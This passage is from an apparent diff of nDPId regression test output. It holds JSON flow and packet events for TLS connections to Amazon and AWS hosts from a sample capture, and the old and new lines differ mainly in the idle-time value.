-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1490976041995,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976041995,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0BJhAAEAGWRasECrYNFXR2NSLAbvD9komsM9I8YAQAVdfcwAAAQEICgD2Trdtm51v"} 
-00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041942,"flow_last_seen":1490976041995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976041995,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976042054,"flow_last_seen":1490976042054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976042054,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1490976042054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042054,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AfNAAEAGW7OsECrYNFXR2NSNAbumNE9OAAAAAKAC\/\/9PagAAAgQFtAQCCAoA9k69AAAAAAEDAwg="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1490976042056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042056,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iw+cfkHGE+VGqAScSB8QwAAAgQFtAQCCAps\/wWhAPZOtAEDAwg="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1490976042057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042057,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0265AAEAGgf+sECrYNFXR2NSMAbsYT5UaPnH5CIAQAVca0QAAAQEICgD2Tr1s\/wWh"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041961,"flow_last_seen":1490976042058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976042058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":269,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041942,"flow_last_seen":1490976042081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1490976042081,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":271,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976041942,"flow_last_seen":1490976042082,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1490976042082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1490976042099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042099,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71I2zekUSpjRPT6AScSDSoAAAAgQFtAQCCAptF6XzAPZOvQEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1490976042101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042101,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0AfRAAEAGW7qsECrYNFXR2NSNAbumNE9Ps3pFE4AQAVdxMgAAAQEICgD2TsJtF6Xz"} 
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041961,"flow_last_seen":1490976042149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976042149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041961,"flow_last_seen":1490976042150,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976042150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1490976042419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G69AAEAGvmqsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/VegAAAgQFtAQCCAoA9k7iAAAAAAEDAwg="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1490976043609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043609,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzNAAEAGfuasECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9jeAAAAgQFtAQCCAoA9k78AAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041942,"flow_last_seen":1490976041942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1490976041942,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BJdAAEAGWQ+sECrYNFXR2NSLAbvD9kolAAAAAKAC\/\/823gAAAgQFtAQCCAoA9k6yAAAAAAEDAwg="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1490976041952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041952,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwusBAAOcGsnU27xi6rBAq2AG7hOPN4I6FxM0uknASH\/5nFQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1490976041953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041953,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYDtAAEAGtAOsECrYNu8YuoTjAbvEzS6SzeCOhlAQAVexhgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041961,"flow_last_seen":1490976041961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041961,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1490976041961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041961,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8261AAEAGgfisECrYNFXR2NSMAbsYT5UZAAAAAKAC\/\/+XjgAAAgQFtAQCCAoA9k60AAAAAAEDAwg="} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041870,"flow_last_seen":1490976041962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976041962,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1490976041989,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041989,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iuwz0jww\/ZKJqAScSDA4QAAAgQFtAQCCAptm51vAPZOsgEDAwg="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1490976041995,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976041995,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0BJhAAEAGWRasECrYNFXR2NSLAbvD9komsM9I8YAQAVdfcwAAAQEICgD2Trdtm51v"} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041942,"flow_last_seen":1490976041995,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976041995,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976042054,"flow_last_seen":1490976042054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976042054,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1490976042054,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042054,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AfNAAEAGW7OsECrYNFXR2NSNAbumNE9OAAAAAKAC\/\/9PagAAAgQFtAQCCAoA9k69AAAAAAEDAwg="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1490976042056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042056,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iw+cfkHGE+VGqAScSB8QwAAAgQFtAQCCAps\/wWhAPZOtAEDAwg="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1490976042057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042057,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0265AAEAGgf+sECrYNFXR2NSMAbsYT5UaPnH5CIAQAVca0QAAAQEICgD2Tr1s\/wWh"} 
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041961,"flow_last_seen":1490976042058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976042058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":269,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041942,"flow_last_seen":1490976042081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1490976042081,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":271,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976041942,"flow_last_seen":1490976042082,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1490976042082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1490976042099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042099,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71I2zekUSpjRPT6AScSDSoAAAAgQFtAQCCAptF6XzAPZOvQEDAwg="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1490976042101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042101,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0AfRAAEAGW7qsECrYNFXR2NSNAbumNE9Ps3pFE4AQAVdxMgAAAQEICgD2TsJtF6Xz"} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041961,"flow_last_seen":1490976042149,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976042149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 